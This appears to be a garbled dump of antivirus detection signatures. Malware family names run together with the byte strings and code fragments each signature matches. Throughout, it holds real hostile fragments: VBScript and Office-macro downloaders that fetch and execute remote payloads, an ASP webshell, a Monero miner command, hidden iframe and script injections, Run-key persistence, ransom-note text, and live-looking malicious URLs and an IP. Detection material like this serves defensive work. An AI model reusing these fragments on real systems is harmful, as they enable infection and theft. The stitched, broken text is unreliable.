s=\"\"dimnn=0dimnnnn=\" cs=\"\"dimnn=0dimnnnn=\" \"dountiln=len(m)n=n+1s=s&chrw(ascw(mid(m,n,1))-&h9000+len(nn))loopexecutes !Obfuscator.TY Behavior:Win32/EdgeInjectBlock.A . Behavior:Win32/EdgeInjectBlock.A Rdpbrute.A !Hagcons.A 'CcZ\tm q2m:? i?/ag^ i?3Vq i?m:? =|+5` 6jFSlL !Dinolap!rfn !Injector.BH!bit Injector.II!bit CreateDecryptorTransformFinalBlock System.Reflection.Assembly !Posokap.A!bit KAPTOXA oscan process with pid for kartoxa \\mmon.pdb !Genmaldow.A!bit C:\\Program Files\\Cmd Files\\ img.syuan.net/forum/ MyAppByMulinB ExeProcesstest server.dat !Injecter MineBicoin.Y minerd-acryptonight-ostratum+tcp://mine.moneropool.org:80-u463rxdz7msmsodw Lminerd-acryptonight-ostratum+tcp://mine.moneropool.org:80-u463rxdz7msmsodw !Banload.BGC content-na.drive.amazonaws.com/cdproxy/templink/ ://cl.ly/ WshShell.Run chr(34) & \" .exe\" & Chr(34),0 !Miniduke!rfn !Spiliwan!rfn !Cuffahlt.C hostf shdnf cachf noncf cmdrf Uflooder.A!bit UDP_Flood Start Attack Eternals UDP Flood !Twexag.B @ \":data=split(data,\"h\")(1):subsavefile(fname,str):dimtemp:setxmldoc=createobject(\"microsoft.xmldom\"):xmldoc.loadxml\"<?xmlversion=\"\"1.0\"\"?>\":setpic=xmldoc.createelement(\"pic\"):pic.datatype=\"bin.hex\":pic.nodetypedvalue=str:temp=pic.nodetypedvalue:withcreateobject(\"adodb.stream\"):.type=1:.open:.writetemp:.savetofilefname,2:.close:endwith:endsub:setws=createobject(\"wscript.shell\"):fn=ws.expandenvironmentstrings(\"%temp%\")&\"\\tmp.exe\": Ransom:Win32/Empercrypt.A schtasks.exe /delete /TN uac /F 0YOUR PERSONAL INFORMATION ARE ENCRYPTED by 7ev3n *bcdedit /set {current} recoveryenabled off dblockchain.info/api/receive?method=create&address= FILES_BACK.txt 4?SSTART=true&CRYPTED_DATA= \"fgate.php?RIGHTS= !Doedlid !Banload.BGD !Tacpud.A RWQEq Disable_All [RCon]| [New]| [Rcon]| [Done]| [Move]| [TCP]| [UDP]|  [HTT]| [Wait]|  Open !Nivdort.DI Trojan:Win64/MineBicoin.Y !MineBicoin.Y !Itagomoko.A !Itagomoko.A]@ |<\tts O>YmE6 |Sc0vA7 _GV!{ Backdoor:Win64/Kenoja.A AAxpergle.CH U?\"\\x 0-9a-f\":\" a-z+=( 0-9+?\" !Pizwin.A ARedirector.QA .useragent;varb3p3f=0;if(nsd5ik.indexof(\"\\u0057in\\x64ows\")==-1||(nsd5ik.indexof(\"msi\\u0045\")==-1&&nsd5ik.indexof(\"\\u0047ec\\u006bo/\")==-1&&nsd5ik.indexof(\"trid\\u0065n\\u0074\")==-1)){return0;}try{try{if(demsfw(jcvjp4p)==od4rg9){returnfalse;}}catch(rdwfb9t){};if(nsd5ik.indexof(\"ms\\x49e\")!=-1||nsd5ik.indexof(\"\\x54rid\\u0065nt\")!=-1){try{b3p3f=umm8qu();functionumm8qu !QQpass.CKH!bit qq.exe786464602A3F3F SendSMSActive Action=AddUser&Server= &User= !Expiro.EA!bit BAOAOOAAO !Fakeon.A!bit 1sass.exe New Folder.exe Hideprocess @Autor David Farji - Concepto 201 !Lidared !Banload.BGE !Injector.ID!bit !Injector.IE!bit !Delf.ZXX!bit !Itagomoko sn\t(,~3 !Wmfap!rfn !Coolvidoor!rfn Trojan:HTML/Redirector.FS <scriptsrc=http://w0rms.com/sayac.js> '<scriptsrc=http://w0rms.com/sayac.js> Backdoor:ASP/Ace.U onerrorresumenextsetfileso=createobject(\"script\"&byp4ss&\"ing.file\"&byp4ss&\"systemobject\")dimhead,endd,pathn,endddfolderpath=request.servervariables(\"pat\"&byp4ss&\"h_trans\"&byp4ss&\"lated\")privatefunctionparsefolder(pathstring)dimlicountifright(pathstring,1)=\"\\\"thenparsefolder=pathstringelseforlicount=len(pathstring)to1step-1ifmid(pathstring,licount,1)=\"\\\"thenparsefolder=left(pathstring,licount !Itagomoko!rfn Zurten.A AIframe.ES status=location;document.write('<iframesrc=\"http://track.wwwapps-ups.com/stats/xstats.php\"width=\"0\"height=\"0\"frameborder=\"0\"></iframe>'); AQakbot.M @ shcHh hcHh]h !Pdfphish.Q !Delf.ZXZ!bit msiexec /q /i] !Uoolop.A!bit !Mkar.I!bit SOFTWARE\\Microsoft\\Mrak \\Netstart\\svchost.exe !Annia!rfn Behavior:Win32/SupTab.R -ptid= !Nivdort.DJ Banablid.A !Tipikit.D !Swizzor.IR !Ryknos.R !Ryknos.S !Small.FK !Opanki.AI !Opanki.AJ !Opanki.AK !Opanki.AL !Opanki.AM !Oscarbot.M !Truim.I !Prix.A !Prix.B !Hooker.P !Wootbot.BI !Spybot.AM !VB.FH !IceHack.A !Luhn.C !Banbra.Q !Utilman.A !Munzter.A !VB.WQ !Junty.A !Simple.A !Luzia.B !VB.WR !winrar.A !Lmirtool.A !Asank.A !Randex.AB FZcXy !Anarchy.A !Mescalin.A !HammerBinder.A 5HammerBinder.A !Floodsave.A !Delf.DZ http://www.universal101.com/upd x=0/ed=0/ex=1  http://aklick.info/d.php?date= 4 !Hamer.A !Hamer.B !Hamer.C !Hamer.D !Hamer.E !Hamer.F !Nilob.A !LookMSN.A !Apropo.N !Novelce.A !Novelce.B !Novelce.C !Apropo.O !Purga.A 5kmo.  k@:] !Boxed.S !Boxed.T !Expor.A !IEZones.D !Delf.FG !Wisdoor.B !Adlinks.A !VB.GH !Outbreak.C !Omefig.A !Gaobot.CZ !Gaobot.DA !Delf.TH !VB.WS !Sdnacm.A !Vasvix.A !Sadfas.A !Swizzor.CH )Atak.F !Delf.EV )Atak.I !Lookme.H !Randex.FF !Salira.A !Startpage.SC !Small.RO !Small.OL !Ciadoor.D !Small.RP !Startpage.TB !VB.B !Bilay.A ~u.\\F0` aOpenStream.I !Safq.A !Teeme.A !Veenet.A w%PYm !RPCNuke.C !VB.EI !Amitis.A !Amitis.B !Amitis.C !Faviant.A !IEZone.A !Gaobot.ZQ DS!b!b !Banco.EL !Banco.EM #Banco.EM !Outbreak.E !VB.BZ !Vidlo.H !VB.EM L(@\"] !VB.EN #VB.EL !Masteseq.F 7iF]7h`% !Masteseq.G !Masteseq.H !Masteseq.I !Masteseq.J !Masteseq.K !Adialer.FI !Masteseq.L !Baasay.A !Masteseq.M ]7`.Z\t !Masteseq.N !Masteseq.O !Masteseq.P !Masteseq.Q !Vaasay.A !Microjoin.D !Small.BT !Qaasay.A !Small.BU !Delf.FI !Dipass.A !Masteseq.R !Masteseq.S !Dipass.B !Shodi.G !CheeShodi.A #CheeShodi.A !Spybot.AP !Spybot.AQ !Spybot.AR !Spybot.AS !Small.NT !Qoologic.C !Adialer.FJ !Badrat.A z;3\t> !Badrat.B !Badrat.D !Badrat.E !Small.EA !Badrat.F !Adpower.E !Badrat.G !Laxor.A !Adialer.FK !Badrat.H !Badrat.I !Badrat.J !Banito.U !Fandool.A !Kamipeef.A !VB.GA !MedMotor.A !Totalvel.A !Small.NU !SecondThought.R !Mudrop.I !Bropia.E !Bropia.F !Bropia.G !Bropia.H !Spybot.BA !Spybot.BB !Spybot.BC !Pakes.C !Bropia.I !Spybot.AY !Bropia.J !Spybot.AZ !Gaobot.ZY !Bropia.L !Spybot.BD !Qoologic.E }1`b`& !Qoologic.F !Fratele.A !Fratele.B !Fratele.C !Wootbot.BK !Wootbot.BL !Wootbot.BM aClassloader.E !Bube.B !Bube.C !Meshbot.A !Bropia.N !Spybot.BJ !Bropia.O !Bropia.P !Spybot.BM !Spybot.BL !Gaobot.AAE !Joiner.AG !Small.M !Small.DE !Radmin.D !Small.PC !Delf.DA !Pino !Wootbot.BN 2-8b63-2f2291d6e56a c8d5ae9d-21af-48c2-89e0-ae60026c5ab0 c8d5ae9d-21af-48c2-89e0-ae60026c5ab0] !Blinsload.A http://lavajatowi.sslblindado.com/ 0#3http://lavajatowi.sslblindado.com/ 01.rar \\vmapp  ?0#c:\\programdata\\  !MobicArch.A !VBInject.AEJ !CVE-2015-1641 !CVE-2015-1641m@ 588%Z_ &dtsz !|+0 `fESaD GkE%;M, GkE%;M,0  %;M,g \\~ W3 JJk,wu  -eH0g  \tejhg Ransom:JS/Fakpst.A t=\"australiapost\"src=\"http:// ut=\"australiapost\"src=\"http://  .ru/ .jpg\">australiapost</td> href=\"http:// @.ru/ @.php?id= @\"_blank\">print Ransom:JS/Fakpst.B .php?id=  =\",\"\\x72\\x65\\x70\\x6c\\x61\\x63\\x65\",\"\\x6c\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\"];window[_  [0]);</script><imgheight=\"1\"width=\"1\"alt=\"\"style=\"display:none\"src=\"// !Banker.AOY r.leandro.santos2015@uol.com.br dusterifos2020@gmail.com agoraachoquevaiavisonovo@gmail.com senderenvioemail.tmp maria2089 !CVE-2015-1770 !Frosparf.A /cdn.pekalongan-kummunity.com InjectMN \\pekalongan.vbp /files/zza15.zip windows\\073CZ59.exe HackAlert Credit Cheat Pekalongan Kommuniti ARedirector.OK bytiger-m@te (bytiger-m@te <script>var_0x =[\"\\x TrojanDownloader:O97M/Donoff.P RwtpBoqn SuklNzMvdmKdHhyKrHvGvcBB hPMQQpTNoydvTmnAOlzBQZSLGHRleJO OGUXESxGLrJiHkxa, qeOtzBJemRtwnWSVq TrojanDownloader:O97M/Mektwool.A  TrojanDownloader:O97M/Mektwool.A Lib \"shell32\" Alias _  \"ShellExecuteA\" (ByVal Lib \"urlmon\" Alias _  \"URLDownloadToFileA\" (ByVal Dim UrlToDownloadAndExecute As String  UrlToDownloadAndExecute = byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec] Craxfora.A G_NomeArqDestinoIniciar Func_Conex Func_TemOCara Func_Arroxa select guarda1 from ropeiro INSERT INTO tbl_avs values (@id_pc,@versao,0,0,@ggbb,0,0,0,0,0,@data) SQL5009.Smarterasp.net Evestern.exe myKey123 TrojanDownloader:O97M/Donoff.Q --8rvvj\" Environ$( StrReverse( Xor first(Temp + first((third + first(third)) Mod 254)) 7Xor first(Temp + first((third + first(third)) Mod 254)) 77Btxxl\", TrojanDownloader:O97M/Donoff.R  = NewPath & NewPath & \"\" & \"C:\\Users\\\" & NewPathe & \"\\AppData\\Local\\Temp\" & Split( S = NewPath & NewPath & \"\" & \"C:\\Users\\\" & NewPathe & \"\\AppData\\Local\\Temp\" & Split(  = LovesAllofYouLoveYour(\"xxx gHJdfh.exec(OIKJIKHJ !VBInject.AER LLLLu S@8}# TrojanDownloader:O97M/Donoff.S \"ht$tp$:/ \t\"ht$tp$:/ \"h??tt??p:/ Environ(Replace(\" , \"$\", \"\")) Replace(\"O ShellExecuteW 0&, !Taloc.H TrojanDownloader:O97M/Donoff.T .exec(obxvhKDkLL95) UnscrambleString(\"mpt\") zBzbmMmAG(0, oz8wJHIeSx8l, obxvhKDkLL95, 0, 0) \"esw.stilhplcr\" !AutInject.BY !Bunitu.M trew/1.0 200 OK ursent rsion tify\\ \\Xhardd ccess\\S rameters\\GirewallPolicy\\StandardProfile\\ !VBInject.AES CCCCu BBBBu !Banload.X =temppasta+zipfile+\"e\"+\"\"\"\"+foldername+nmfile+\"\"\"\"+\"-aoa\"+\"-p\"+pass+\"-o\"+\"\"\"\"+foldername+\"\"\"\"+\"*.exe\"+\"-r\"wshshell.run ,1,true temppasta+fcrypt(hextostring(zipfile),ch3a)+\"e\"+\"\"\"\"+foldername+fcrypt(hextostring(nmfile),ch3a)+\"\"\"\"+\"-aoa\"+\"-p\"+pass+\"-o\"+\"\"\"\"+foldername+\"\"\"\"+\"*.mkv\"+\"-r\"wshshell.run !CeeInject.GM !Banload.Y !Obfuscator.APU !Febian.A d:\\ms.txt \\bfconfig.txt BianFengBackDoorV !Obfuscator.APV !Obfuscator.APW Behavior:Win64/Lequse.A!dha Behavior:Win32/InjectedRemoteThreadSqlservr .+Behavior:Win32/InjectedRemoteThreadSqlservr Trojan:Win64/Lequse.A!dha !Padede.A SIGATTR:Win32/Padede.A&HSTR:Win32/Padede.A] .*SIGATTR:Win32/Padede.A&HSTR:Win32/Padede.A] !Kripfly.A linkzip,stemppast+nameziptpushuulinkpri,stemppast+namepristr8zip=stemppast+namezip+\"x\"+stemppast+namepri+\"-aoa\"+\"-p\"+spasswd+\"-o\"+sapppastobjwshell.runstr8zip !Obfuscator.APX Pluterdma.A -opuntos.exehttp://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe G-opuntos.exehttp://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe !Startpage.XZ !Banload.Z +M:@j Q+M:@j !Eigivef.A !Obfuscator.APZ !Banload.AA environ(chr(65)&chr(112)&chr(112)&chr(68)&chr(97)&chr(116)&chr(97))&chr(92)&chr(86)&chr(66)&chr(69)&chr(5 )iffileexists(slocalpath&chr(92))thenwscript.quitmkdirslocalpathslocalpath=slocalpath&chr(92)&randomstring(8)&chr(46)&chr(101)&chr(120)&chr(101) chr(104)&chr(116)&chr(116)&chr(112) !Banload.AB =wscript.createobject(\"wscript.shell\")dimappdatawin7=objwshell.expandenvironmentstrings(\"%appdata%\")winxp=objwshell.expandenvironmentstrings(\"%windir%\\system32\")a0218367812b\"ht !CeeInject.gen!LG Dolphtoob.A eE*mw U6I775B3XVykqfxRtyePbA== Dolphin Boot - Coded For Dolphin Protector /c echo [zoneTransfer]ZoneID = 2 > pchealth.exe UrlAssociations\\http\\UserChoice 4hrfienz.rfk.dll !Banload.AC regsvr32.exe/s\":savebinarydatabinarygeturl(surl&\"c.html\"),snomeimg:objwshell.runscamaro&smonza&snomeimg&smonza&ssenha wregsvr32.exe/s\":savebinarydatabinarygeturl(surl&\"c.html\"),snomeimg:objwshell.runscamaro&smonza&snomeimg&smonza&ssenha !Olutall AMeadgive.V Exploit:HTML/Meadgive.N !Obfuscator.AQA !VBInject.AEQ !Upatre.CD > gL] !CeeInject.GN !Injector.GW TrojanDownloader:O97M/Kriof.A -window hidden -enc Critical Microsoft Office Error JAAxACAAPQAgACcAJABjACAAPQAgAC Ransom:HTML/Tescrypt j,k-+ Bartallex.M  As Integer) )  & \"om/w\" & \"p-includes/theme-compat/\" (ATTH + STT1 + LNSS) Behavior:Win32/DnsTamperLib !OnionDuke.A!dha !OnionDuke.C!dha upload_slowdown_ms: master_slave_policy: post_per_request_limit_kb: local_limit_mb: mycert: hex( - arg: campaign_id !OnionDuke.B!dha !OnionDuke!dha Nagoot.A I=M>\t] !Worqid.A !Upatre.CE !Banker.AOZ !AutInject.BZ :.iI7 !Seepeldown.D !VBInject.AET !Obfuscator.AQC !Brucryp O+P3f85OR !Startpage.YH !Alucple !Codbot fGLOBAL CONST $DVD_FILE_ROOTPATH = \"autorun\\autorun. GLOBAL CONST $DENY_PROCESS_LIST = STRINGSPLIT ( \"Burn|nero|clone|iso|dvd|cd|alc|bw|taskmgr\" , \"|\" ) GLOBAL CONST $DENY_WINDOWS_LIST = STRINGSPLIT ( \"Ashampoo Burning Studio|Alcohol 120|Alcohol 52\" , \"|\" ) REGWRITE ( \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" , \"NETLib\" , \"REG_SZ\" , @SCRIPTFULLPATH ) #NoTrayIcon #RequireAdmin] !Weebu.A !Obfuscator.AQB !Obfuscator.AQD Ffloq.A set_Expect100Continue Firefox.Resources.resources ConfuserEx v0. ConfuserEx v0.g Katara.A Tectizo.A Subti.G /c reg add \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\W !Slackbot.D p8eJ* )Gopworm.A )Heyya.A )Skybag.B B_T(y )Torvil.D !Blaxe.A !Bomka.A !VB.ZS !VB.ES !Delf.HN !Bancos.ID !Banker.UJ !VB.ANO !Banker.DER !Bomka.B !VB.IF !Aimbot.BA !Amitis.D !Beastdoor.CK !Beastdoor.CL !Beastdoor.CM !Beastdoor.CN !Bifrose.DB !Bionet.F !Coldfuson.I !Delf.YU !Delf.YV !Kamikaze.A !Lithium.C !Netdevil.L !Optix.AA !Optix.AB !Optix.AC !Optix.AD !Optix.AE !Optix.AF !Optix.AG !Optix.AH !Optix.AI !Optix.AJ !Winshell.G !Winshell.H !Winshell.I !Winshell.J !Winshell.K !Eliterab.B l,+K@ !Madtol.G !Delf.KV ,taWi !VB.WJ !VB.WK !WarSpy.G !Bancos.IF !Delf.GY !Scane.A !Tuim.D !Tuim.E !Smuma.B !Smuma.A !Mulod.A !Yiha.A !Bifrose.B !Feardoor.L !Sfind.B !Frusion.A !Ducky.A !PWSteal.D !Zinflow.A aFURootkit.A do'MK c0\\Q}s&G !VB.WA !Aflooder.A !VB.WB !VB.K !PcClient.C !Aflooder.B !ProcKiller.A !VB.WC !Delf.RJ !Small.VL !Sennaspy.2000 !Funner.A !Recto.A !Small.VN !Small.VO !VB.WD !Small.AF r aiE !Gaobot.ZG !Small.VR !VB.BU !VB.WE !Small.AG !Splitu.A !Tuim.G !Tuim.H 5P1):v !Lmir.QW !Small.BV Maxload.A V/e ] )Mywife.G !Protoride.AD !Bancos.BH !Randex.FD !Gaobot.ZH !Dcom.BX !Banbra.R !Small.LS !Delf.FE !Bancos.BK Provider=SQLOLEDB.1;Password= javascript:enviaUrl Enviarpgina Windows messenger javascript:cadastroSenhas() \\liberaplug.log !Delf.SC !DcomScan.A !Small.MI !Small.MK !Small.ML !Bancos.BL !Wootbot.CR !Startpage.PS !Small.MM !Gaobot.ZK !Small.MO !Inof.A !Small.MQ !Banbra.Z !Small.MS \t7t!\") !Small.MT !Triject.A !Bifrose.E !Spybot.AO !Small.MU !Delf.FH !Small.MV !Adfram.B !Small.MW !Adfram.C !Adfram.D aClassloader.D !Adfram.A >c@lf !Pekax.A !Spuid.A !Smym.A )Mugly.C !NetexScan.A !SynFlood.F !Small.MX !Gaobot.ZL !Gaobot.ZM !Banbra.AA !Small.BW !Small.MZ !WebSearch.C !Webber.L !Delf.FF qEeg& !Hidproc.A !Small.NA >dM,G !AdSearch.A !AdSearch.B !Winad.B !Protoride.AF !Small.MY !NetexScan.B +Klez.H@mm !Small.NB !VB.DX !Startpage.PW !Outbreak.D !Small.NC !Startpage.PV !Small.B !Small.AL h<[ g/\\ !Small.AM !Small.AN !Banbra.AB !Startpage.PX !Adialer.FE !Adialer.FF !Adialer.FG !VB.DY !Small.BZ !Killfiles.FI !Killwin.W !Primativ.A !Zalim.A !Small.AO !Small.AP !Small.CN !Small.NP !Small.NQ !Zalim.B !Small.L !Berbew.CN !Berbew.CO !Banker.FO !Small.NR !Small.CO Behavior:Win32/Dirtvanontufo.A!nri .\"Behavior:Win32/Dirtvanontufo.A!nri Behavior:Win32/Solorabbit.B!nri Behavior:Win32/MZPEMemoryArtifacts.D .$Behavior:Win32/MZPEMemoryArtifacts.D !Chadivendo.STA Global\\ !Chadivendo.STB !Chadivendo.STC Pjjjjjjjh DebugBreak \\Temp\\edg AgentTesla.OXAR!MTB AgentTesla.OXAS!MTB Trojan:PDF/Phish.RRE!MTB Behavior:Win32/SuspMshtaLaunch.B . Behavior:Win32/SuspMshtaLaunch.B Behavior:Win32/RegWriteScript.A PP\t@/L\\microsoft\\windows\\currentversion\\run vbscript:execute Behavior:Win32/RegWriteScript.B PP\t@4 hkcu\\software  test-connection Puntil Exploit:O97M/CVE-2017-11882.HZ!MTB \"Exploit:O97M/CVE-2017-11882.HZ!MTB @ !Chadivendo.STD ServiceDll wwlib.dll Psc start \"%s\" f2032.com \tf2032.com Worm:AndroidOS/Goodnews.B!MTB Lcom/chodukaka/isporban StartAppAd  getSubId You need to click on Ad to Continue. $You need to click on Ad to Continue. To start Tiktok, follow next steps \"To start Tiktok, follow next steps Click on Next Button to continue  Click on Next Button to continue http://tiny.cc/Tiktok-Pro Share this APP on Whatsapp groups 10 Times.\\nto Start Tiktok. =Share this APP on Whatsapp groups 10 Times.\\nto Start Tiktok. AgentTesla.TL!MTB )1~]Tm TrojanDownloader:O97M/EncDoc.PKM!MTB $TrojanDownloader:O97M/EncDoc.PKM!MTB Behavior:Win32/DllMsiexecInject.B .!Behavior:Win32/DllMsiexecInject.B Trojan:ASP/Webshell.PB!MTB Trojan:O97M/ZLoader.RJ!MTB Racealer.DA!MTB $4365bee4-1b24-4b5f-815e-d5408dea8639 OnScreenKeyboard.Properties.Resources DebuggingModes] Racealer.DB!MTB $519712d6-3c83-4b33-92b5-37f06995e528 $AAC9D1F6-E722-467C-8DAC-634967DB27FE SB.My.Resources FallbackManager.My.Resources !Ranumbot.RF!MTB eGlVXL Pjjjj DarkKomet.R!MTB !Stealer!MTB !SpyNoon!MTB !AveMaria!MTB !Spynoon.AVP!MTB TrojanDropper:O97M/Hancitor.EMLU!MTB %$TrojanDropper:O97M/Hancitor.EMLU!MTB & \"\\MsMp.dll\") = \"\" Then plop & \"\\MsMp.dll\") Call rnee(uuu, aaaa)] Agensla.GD!MTB http://myliverpoolnews.cf/liverpool-fc-news/features/ UserAgent: DownloadString] Rocke.A!MTB TrojanSpy:PowerShell/Stealer!MSR ' TrojanSpy:PowerShell/Stealer!MSR :\tdg& TrojanDownloader:O97M/EncDoc.RGEA!MTB %TrojanDownloader:O97M/EncDoc.RGEA!MTB 4htps:/ino.caregjc\\zmsffdwbkdvxul,rvlmontajexuyighpby 74htps:/ino.caregjc\\zmsffdwbkdvxul,rvlmontajexuyighpby TrojanDownloader:O97M/Obfuse.BB!MTB #TrojanDownloader:O97M/Obfuse.BB!MTB zzzzh_b64 = zzzzh_b64 & \"/lasdwe/bdaa3811-bb6c-42c7-ae25-0329f3a59ce1\", 436, zzzzh DynMemcpy alloc, zzzzh, hread, hwrite .ExpandEnvironmentStrings(\"%TEMP%\") & \"\\cym_16001380430BD84B24.exe\" Based = Based & hcffgfawrenm( & Chr$(Val(\"&H\" & Mid$( , 2))) = kuQWG9Jl(UserForm1.Label1.Caption) .Environment(\"process\").Item(\"param1\") = .run \"cmd /c call %param1%\", 2 = Split(afterBool, \"#\") c:\\\\users\\\\public\\\\nameTpl.h Optional refCnt = \"t\", Optional lBDocument = \"a\") = responseDeleteResponse & convertScr & \"\" & refCnt & lBDocument = responseDeleteResponse & convertScr & \"\" & refCnt & lBDocument] !SelfDel.V!MTB axq,Ng Trojan:Win64/CryptBanker!MTB Trojan:Win64/CryptInject.V!MTB Asyncrat!MTB Ransom:MSIL/Cring.DA!MTB your network is encrypted Crypt3r @tutanota.com killme.bat killme.bat] !Stelega.DE!MTB Ftbi}oMeakBqabzzrA Ftbi}oMeakBqabzzrA] !QQPass.DA!MTB KLJEWERHsdwqeh23211!@asdqSADwe BRESUZCDY.jpg wahaha wahaha] Trojan:AndroidOS/FakeApp.K!MTB Lcom/wagd/gg/MyService; /update/update.conf load64Data bytes getThisAppArch MobclickRT  /system/app/Kinguser.apk TrojanDropper:O97M/Donoff.PK!MSR % TrojanDropper:O97M/Donoff.PK!MSR = \"s\" & \"c\" & \"he\" & \"du\" & \"le\" & \".\" & \"s\" & \"e\" & \"r\" & \"vic\" & \"e\" F= \"s\" & \"c\" & \"he\" & \"du\" & \"le\" & \".\" & \"s\" & \"e\" & \"r\" & \"vic\" & \"e\" = \".\" & \"e\" = writeToFile(p & \"b.doc\", tOut)  = writeToFile(p & \"b.doc\", tOut) = \"x\" & \"e\" = publicpath & bslash & \"do\" & \"c\" & \"u\" & \"m\" & \"e\" & \"nt\" & \"s\" & bslash J= publicpath & bslash & \"do\" & \"c\" & \"u\" & \"m\" & \"e\" & \"nt\" & \"s\" & bslash = StrConv(\"PF&5NQK*mR^x94GE6HaU>%M;L{17/}@lDXgWq,ovitj`s~$fASyJcOd :rT8bV3-0\", vbFromUnicode) ]= StrConv(\"PF&5NQK*mR^x94GE6HaU>%M;L{17/}@lDXgWq,ovitj`s~$fASyJcOd :rT8bV3-0\", vbFromUnicode) Behavior:Win32/Chadivendo.A Lnet start !Chadivendo.STE ServiceResponce.dll ServiceResponce.dllServiceMain !Chadivendo.STF  %08x.txt TrojanDownloader:O97M/IcedId.MR!MTB #TrojanDownloader:O97M/IcedId.MR!MTB Behavior:Win32/ModMon Behavior:Win32/SystemMiner.A --donate-level AgentTesla.OXAT!MTB TrojanDownloader:O97M/IcedID.RVN!MTB $TrojanDownloader:O97M/IcedID.RVN!MTB \"c:\\progra\", Optional   = \"ta\" ((\"explorer \") Split(ActiveDocument.Range.Text, \"x\") & \"mdata\\  .h\" & Print #1,      out & Chr(arr(cnt) Xor 100) TrojanDownloader:O97M/Obfuse.RVW!MTB $TrojanDownloader:O97M/Obfuse.RVW!MTB ddzdqsdff() & \"\\\" + rmlkejgmlkdfjgri(2) + \".exe\" PxPToxhq.Open \"GET\", sdqsldjkf, False slkfjdfjhglkjdshze.Run XxX, 1, True str & Mid(LETTERS, Int(strLen * Rnd + 1)) str & Mid(LETTERS, Int(strLen * Rnd + 1))] TrojanDownloader:O97M/Donoff.MXT!MTB $TrojanDownloader:O97M/Donoff.MXT!MTB \"HTTPDownload 'http://1lxtjdias-pod:8080/stage3.exe' CreateObject (\"; Scripting.FileSystemObject; \") Wscript.CreateObject (\"; Wscript.Shell; \") \"WshShell.Run strFile\" FolderExists(Left(path, InStrRev(path Shell \"wscript C:\\DEV\\VBA\\stage2.vbs\" fp = \"C:\\DEV\\VBA\\stage2.vbs\" fp = \"C:\\DEV\\VBA\\stage2.vbs\"] !Konus.SG!MTB data_inject [TAB] [DELETE] [BACKSPACE] [RETURN] F3P7Y6P3U3E2U5F3 P4Y7T7R7R8X3E3A3 D3S0A7R4F6C8F2R5   :Zone.Identifier profiles.ini B \\Google\\Chrome\\User Data\\Default\\] !Konus.SH!MTB C3E0Q6R7F1H2G5A4 https://api.ipify.org/ ?a=3 ?a=3     explorer.exe] Behavior:Win32/DridexDllPreload.A .!Behavior:Win32/DridexDllPreload.A @!\\syswow64\\ @!\\system32\\ Behavior:Win32/DridexDllPreload.B .!Behavior:Win32/DridexDllPreload.B !Salgorea.A!MTB !Spynoon!MTB !Predator.SS!MSR !Predator.AR!MSR !Predator.PJ!MSR NanoBot.RKC!MSR !Tnega.AL!MTB ZJ:2 u f k,J !Obfuse.MXR!MTB dimmdpe, mdpe=\"krbgdwdtjonzpcmditsbquporkyvowsjggzrmtm\"setmdpe=createobject(\"microsoft.xmlhttp\") =\"https://pjoao1578pro2.site/crypt/vbscript.txt\"mdpe.open\"get\", ,falsemdpe.send\"\"execute(\"execute(mdpe.responsetext)\") Ransom:Win64/DelShad!MSR !Borhieda.STA Processcurb.A!MTB Trojan:Win64/CobaltStrike.STB Trojan:Win64/CobaltStrike.STB\t@ 8+Veb~ !Lokibot.RV!MTB !Obfuse.RA!MTB pjoao1578pro2.site/crypt/vbscript.txt 3pjoao1578pro2.site/crypt/vbscript.txt  Ohttps:// Processcurb.A1!MTB startingexploit..$nc\"sleep4echo\"\"echo-e\"$az$cu2$bcheckpathbash @startingexploit..$nc\"sleep4echo\"\"echo-e\"$az$cu2$bcheckpathbash Processcurb.A2!MTB echo-e\"$v$cu1$bgettingashellasroot..$nc\"sleep2echo\"\"tputcnorm ?echo-e\"$v$cu1$bgettingashellasroot..$nc\"sleep2echo\"\"tputcnorm APhish.VS!MSR window.frames['load-url'].location='http://r3.o.lencr.org/' =window.frames['load-url'].location='http://r3.o.lencr.org/' !CobaltStrike!MSR http://185.225.19.240/dmenconsvc.dll &http://185.225.19.240/dmenconsvc.dll Trojan:XML/ObfInject!MTB TrojanDownloader:O97M/TrickBot.RTS!MTB &TrojanDownloader:O97M/TrickBot.RTS!MTB !Empire.B eMicrosoft Loader] !Banker.SE C:\\TEMP\\\\ 0KC:\\Documents and Settings\\ \\Local Settings\\Application Data\\amb0 Banker.D !VB.AEE !Delf.JJ !Pidief.CI !Pidief.CJ !Pidief.CK aOpenStream.AP !VBInject.NG !VB.LP Scylla Botnet.+\\\\Server\\\\Proyecto1.vbp ,'Scylla Botnet.+\\\\Server\\\\Proyecto1.vbp !Startpage.NT [*9\"< !VB.AEF \\\\Laboratorio de Virus\\\\WinXP\\\\Downloader.vbp 3.\\\\Laboratorio de Virus\\\\WinXP\\\\Downloader.vbp !QQpass.DZ !Agentsmall.F C0\t\t8  C0\t\t8  C0\t\t !Agentsmall.G !Agentsmall.H C0\t\tz  C0\t\tz , C0\t\t !Delall.D !QQpass.CJA !Slefdel.C !Murlo.R !Murlo.N !Murlo.Q !Startpage.ACA !Startpage.ACB !QQpass.CIB !OnLineGames.ZEC ]GB}n !VB.YAI !VB.YAL !OnLineGames.ZEE!dll ~f]yu !VB.YAC fSM/N. -j'@d !FakeMS.C -uzf-- !Delf.ZXA !OnLineGames.AAE !Startpage.YG !Delf.ZXB Hh4c@ kA.-\t !VB.AEZ !VB.YAJ )o}a: !Zhbin.A !Startpage.YF Startpage.C Startpage.D !Startpage.AB 8CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\ShellFolder #WshShell.CreateShortcut(Favorites & J\\In\"&\"t\"&\"ern\"&\"et Expl\"&\"or\"&\"er\\M\"&\"a\"&\"i\"&\"n\\S\"&\"t\"&\"ar\"&\"t P\"&\"a\"&\"ge\" 1\\Wi\"&\"nd\"&\"ows\\C\"&\"urren\"&\"tVers\"&\"ion\\R\"&\"u\"&\"n\\ /f/q/a del \" \\Internet*.*\" 1nkfile\\shellex\\IconHandler 1nkfile\\shellex\\IconHandler] !Agent.EK open\\internetexplorer\\iexplore.exehttp://home.zh-cn.cc/ 9open\\internetexplorer\\iexplore.exehttp://home.zh-cn.cc/ !Agent.EL 